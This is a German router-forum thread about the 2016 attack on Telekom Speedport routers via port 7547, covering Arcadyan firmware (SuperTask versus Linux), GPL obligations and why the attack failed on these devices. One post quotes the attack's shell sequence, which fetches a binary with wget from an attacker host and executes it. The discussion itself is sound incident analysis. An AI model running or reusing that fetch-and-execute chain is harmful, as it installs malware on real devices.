qwertz.asdfgh
IPPF-Promi
- Mitglied seit
- 18 Feb 2011
- Beiträge
- 4,467
- Punkte für Reaktionen
- 66
- Punkte
- 48
Das ist richtig, SuperTask ist sozusagen "EOL". Die Modelle W723V Typ B und W921V waren m.W.n. auch die letzten Arcadyan-Speedports mit SuperTask (oder ist es doch schon der Nachfolger SMX-RTOS?). Die Firmware der Nachfolgemodelle von Arcadyan (W724V Typ B oder auch W922V) basiert dagegen auf einem Linux-Kernel bzw. genauer auf OpenWRT.Ich hoffe mal nicht, daß SuperTask wirklich noch weit verbreitet ist. Soweit ich weiß, hat das Lantronix doch irgendwann vor > 10 Jahren schon eingestellt, oder?
Die Firmware der Speedport-Modelle von z.B. Huawei oder AVM basierten schon vorher auf dem Linux-Kernel. Das ist imo auch der Grund warum es für die Speedport-Modelle von Arcadyan bis zum W921V keine Quelltexte für die Firmware gab, lediglich für den OpenSource Bootloader U-Boot den Arcadyan einsetzte gab es den Quelltext zum Download.
Das ist klar, nur ohne wget (bzw. einen funktionierenden Alias auf eine vergleichbare Funktion bzw. Programm) in der Firmware könnte das fragliche Binary nicht nachgeladen werden wenn ich die Informationen u.a. aus Beitrag #6 korrekt interpretiert habe. Wenn Arcadyan wget tatsächlich bei diesen älteren Modellen eingesetzt hatte so vermisse ich entsprechende Hinweise auf den Einsatz dieser OpenSource Software, soweit ich weiß wurde im Handbuch nur U-Boot als OSS erwähnt.Das fragliche "wget" war ja auch nicht das Programm, was nachgeladen wurde ...
Und das wäre dann eine weitere Frage...Mich würde eher interessieren, wieso da auf den fraglichen Geräten "iptables" aktiv sein sollte (das "Abschalten" von Port 7547 durch die Schadsoftware soll ja darüber erfolgt sein) ... das steht ja wieder unter GPLv2 und wäre eine "Komponente/Funktion", wo der "Verbreiter" zur Veröffentlichung/Weitergabe auf Anfrage verpflichtet ist.
- - - Aktualisiert - - -
Nein, zumindest keine offiziellen (was nicht bedeutet, dass man über den Bootloader keine Firmware hochladen kann).Ich frage mal aus Neugier ... gibt es bei den Speedports auch Recovery-Tools wie bei den AVM-Fritz!Boxen?
Da Speedports (wie viele andere Router auch) einen Resettaster besitzen scheint man das auch nicht für notwendig zu halten. Dbzgl. haben die Router von AVM eine kleine Sonderstellung, kein Resettaster in Hardware aber dafür gibt es ein offizielles Wiederherstellungsprogramm was den Upload der Firmware über den Bootloader sehr einfach gestalten soll.
- - - Aktualisiert - - -
Mich würde eher interessieren, wieso da auf den fraglichen Geräten "iptables" aktiv sein sollte (das "Abschalten" von Port 7547 durch die Schadsoftware soll ja darüber erfolgt sein) ...
Es scheint gar nicht so weit gekommen zu sein (bei den betroffenen Speedports), es ist wohl noch nicht einmal wget auf den betroffenen Speedport-Modellen vorhanden (was nicht verwunderlich ist). Es sieht wohl so aus, dass die Speedports lediglich durch die hohe Anzahl an Anfragen "nur" überlastet waren.
Es ist wohl (aufgrund Ermangelung von wget) noch nicht einmal zum Download des entsprechenden Binary gekommen bei den betroffenen Speedports, die Befehle "cd /tmp", "wget http://tr069.pw/1", "chmod 777 1" sowie "./1" wurden zwar ausgeführt konnten aber keine Wirkung zeigen (da kein *nix-System).
https://www.telekom.com/de/medien/details/information-zu-aktuellen-beeintraechtigungen-444854
https://www.telekom.com/de/medien/details/mythos-offene-schnittstelle-was-wirklich-geschah-445232
https://twitter.com/deutschetelekom/status/803672364881805312
Man kann wohl zusammenfassen: Die Telekom hat richtig Glück gehabt, dass die Speedports offensichtlich nicht Ziel des Angriffes waren!
Zuletzt bearbeitet: